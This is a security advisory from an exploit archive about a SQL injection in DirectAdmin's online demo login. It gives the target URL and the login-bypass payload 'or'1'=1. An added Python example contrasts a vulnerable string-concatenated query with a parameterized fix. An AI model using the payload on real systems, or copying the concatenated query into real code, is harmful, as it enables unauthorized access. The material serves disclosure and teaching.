DirectAdmin On-Line Demo SQL Injection

2013.02.14
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

++++++++++++++++++++++++++++++++++++++
# Exploit Title: DirectAdmin On-Line Demo SQL Injection
# Vendor: http://www.directadmin.com/
# Author: Juan Carlos García
# Blog: http://hackingmadrid.blogspot.com
# Facebook: https://www.facebook.com/pages/Tiger-Team/606699939344001?ref=hl

DESCRIPTION
+++++++++++
DirectAdmin is a graphical, web-based hosting control panel designed to make administration of websites easier. DirectAdmin is compatible with several versions of Red Hat, Fedora Core, Red Hat Enterprise Linux, CentOS, FreeBSD, Ubuntu and Debian.

PoC
++++
https://www.directadmin.com:2222/CMD_LOGIN

user: user_demo
pass: demo

OR

user1: 'or'1'=1
pass1: 'or'1'=1

Procedure: Login using user1/pass1

++++++++++++++++++++++++
Tiger Team Security Nightsec
++++++++++++++++++++++++
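The advisory classifies the issue as CWE-89 but gives no query. The block below is an added illustration, not DirectAdmin code and not the author's PoC: it assumes a hypothetical login check over a constructed in-memory SQLite table with the demo credentials from the advisory, and contrasts a string-concatenated query with a parameterized one. Fed the advisory's `'or'1'=1` value, the concatenated version hands the input to the SQL parser (here it surfaces as a syntax error, which is the tell that the input is being interpreted as SQL rather than as data); the parameterized version binds the same string as a plain value and simply fails the login.

```python
import sqlite3

# Value taken verbatim from the advisory's PoC (user1/pass1).
PAYLOAD = "'or'1'=1"


def make_db():
    """Constructed in-memory user table; not DirectAdmin's real schema (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Demo credentials as listed in the advisory.
    conn.execute("INSERT INTO users VALUES ('user_demo', 'demo')")
    conn.commit()
    return conn


def build_concatenated_query(username, password):
    """The CWE-89 pattern: untrusted input spliced into the statement text."""
    return (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )


def login_vulnerable(conn, username, password):
    """Hypothetical vulnerable login: whatever the user typed becomes SQL."""
    row = conn.execute(build_concatenated_query(username, password)).fetchone()
    return row is not None


def login_fixed(conn, username, password):
    """Hardened login: placeholders keep the input in the data plane."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


def run_demo():
    """Exercise both login paths with the demo credentials and the PoC value."""
    results = {}
    for label, login in (("vulnerable", login_vulnerable), ("fixed", login_fixed)):
        conn = make_db()
        results[(label, "legit")] = login(conn, "user_demo", "demo")
        try:
            results[(label, "payload")] = login(conn, PAYLOAD, PAYLOAD)
        except sqlite3.OperationalError as exc:
            # Only the concatenated query can end up here: the quotes in the
            # input changed the statement's structure and the parser rejected it.
            results[(label, "payload")] = "syntax error (input reached SQL parser): " + str(exc)
    return results


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, "->", value)
```

The useful signal for a defender is not whether this particular string logs in, but that the concatenated path lets a login field rewrite the statement at all; a database error on a login form is itself an indicator worth alerting on, and the parameterized path removes the class of bug rather than this one input.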

References:

http://www.directadmin.com/
https://www.facebook.com/pages/Tiger-Team/606699939344001?ref=hl



Copyright 2024, cxsecurity.com
